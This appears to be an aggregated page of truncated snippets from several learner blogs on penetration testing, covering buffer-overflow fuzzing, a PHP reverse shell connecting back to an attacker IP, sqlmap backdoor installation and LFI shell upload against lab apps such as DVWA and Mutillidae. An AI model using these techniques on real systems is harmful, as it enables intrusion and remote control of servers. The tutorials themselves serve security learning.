mimmoo.wordpress.com
Day 1 – My First Experience | mimmoo
https://mimmoo.wordpress.com/2011/05/28/day-1-my-first-experience
Just ordinary people who want to share. Install Flash Player on Backtrack →. Day 1 – My First Experience. May 28, 2011. This is my first experience studying about network security (hacking world) …. Basically I am not people understand about network security, even now still do not understand. but it never hurts to keep learning. Spirit …! 8211; tried to enter a user password perfunctory. Result: wahahahahaha …. This crazy idea … not working. 8211; tried to download the tools:. 8211; and it turns out that...
litle-book.blogspot.com
Learning: December 2011
http://litle-book.blogspot.com/2011_12_01_archive.html
Learning to increase knowledge. All you need to be a shinobi is the guts to never give up! Tuesday, December 27, 2011. SEH Based Buffer Overflow. This time I will. Application, this firs time I learn about buffer overflow. To that aplication 2000. Bytes of data, this the sample fuzzer with python :. Ips = '192.168.56.101'. String = "A" * 2000. Launching Remote BoF on", ips,",hang on tight! S=socket.socket(socket.AF INET,socket.SOCK STREAM). Connect=s.connect( ips, port). Check your debugger.". To know ho...
soykrucil.blogspot.com
Web Application Security: Mapping The Application
http://soykrucil.blogspot.com/2012/03/mapping-application.html
Kamis, 29 Maret 2012. The first steep in process of attacking the application is gathering and some key information about it to gain a better understanding what are you up against. the mapping exercise begins by enumerating the application content and functionality to understand what the web application does and how it behaves. much of this functionality is easy to identify, but some of it maybe hidden, requiring a degree of guesswork and lucky discover. Enumerating Content and Functionality. Burp intrud...
litle-book.blogspot.com
Learning: June 2011
http://litle-book.blogspot.com/2011_06_01_archive.html
Learning to increase knowledge. All you need to be a shinobi is the guts to never give up! Thursday, June 30, 2011. Allows the flow of network traffic between hosts to be segregated based on a network configuration. By organizing hosts into logical groups, subnetting can improve network security and performance. Perhaps the most recognizable aspect of subnetting is the subnet mask. 11111111 11111111 11111111 00000000. Is typically shown in the equivalent, more readable form. Applying a Subnet Mask. Is in...
koko-newbie.blogspot.com
Newbie's Blog: Webgoat Installation
http://koko-newbie.blogspot.com/2011/06/webgoat-installation.html
Thursday, June 23, 2011. In this chance, I will tell you about how to installation webgoat. Follow the steps below :. Extract webgoat with this command :. Root@bt: #7z x WebGoat-OWASP Standard-5.3 RC1.7z. Used for unzip WebGoat-OWASP Standard-5.3 RC1.7z. Used for extract file with full path. Then, move the directory WebGoat-5.3 RC1 to /pentest/web :. Root@bt: #mv WebGoat-5.3 RC1 /pentest/web/. Entered into the directory WebGoat-5.3 RC1, change webgoat.sh to be executable :. Run webgoat with this command :.
soykrucil.blogspot.com
Web Application Security: Desember 2011
http://soykrucil.blogspot.com/2011_12_01_archive.html
Selasa, 06 Desember 2011. PHP Reverse Shell On Linux Server. If you are attacking a website and successfully compromised, you have to connect back from the web server machine to your local machine for future Attack. I have one simple php script to do that, only enter your ip address and your port on the URL to connect back. for example :. Http:/ 192.168.56.101/rs.php? Ip=192.168.56.1&port=1234.
koko-newbie.blogspot.com
Newbie's Blog: Installing Backdoor in the Database through SQL Injection
http://koko-newbie.blogspot.com/2011/07/installing-backdoor-in-database-through.html
Monday, July 25, 2011. Installing Backdoor in the Database through SQL Injection. Now, I will to explain about how to installing backdoor in the database through SQL Injection. For this practice, I try to use DVWA as web application. DVWA is already available web application about SQL Injection and SQL Injection (Blind). Root@bt:/pentest/database/sqlmap# ./sqlmap.py –u "http:/ 192.168.56.101/dvwa/vulnerabilities/sqli/? Id=admin&Submit=Submit" - cookie="security=low; PHPSESSID=0pggchrjrb0lj1ttrobmp1ace4".
soykrucil.blogspot.com
Web Application Security: September 2011
http://soykrucil.blogspot.com/2011_09_01_archive.html
Kamis, 22 September 2011. SQL INJECTION is a code injection technique that exploit a security vulnerable occurring in database layer of an application like Queries. the vulnerability is present when user input either incorrectly filtered for string. 160;embedded in SQL. 160;statements or user input is not strongly type. 160;and thereby unexpectedly executed. It happens from using poorly designed query language interpreters. In the wild, it has been noted that applications experience, on average.
soykrucil.blogspot.com
Web Application Security: Agustus 2011
http://soykrucil.blogspot.com/2011_08_01_archive.html
Senin, 08 Agustus 2011. Today I will share you how to upload shell to web server with local file inclusion (LFI). First I was tried one web that vulner of LFI attack then I tried to inject the variable page like this. Http:/ 192.168.56.101/mutillidae/index.php? Page=/ and it got an error like this bellow. Include(./) [ function.include. Failed to open stream: No such file or directory in /opt/lampp/htdocs/mutillidae/index.php. 160;on line 352. 160;on line . The result like this :.
soykrucil.blogspot.com
Web Application Security: Juli 2011
http://soykrucil.blogspot.com/2011_07_01_archive.html
Minggu, 24 Juli 2011. Automatic Sql injection and Database Take Over tool. Hey today i will show you how to generate a simple backdoor using sql injection technique by using sqlmap tool. Once I was found a web application that vulnerable of sql injection attack. the target url like this 192.168.56.2/coba/index.php? Id=1 a simple testing I tried to insert character on the parameter id the result url like this 192.168.56.2/coba/index.php? Id=1 it has a error like below :. Selasa, 19 Juli 2011. Now, this we...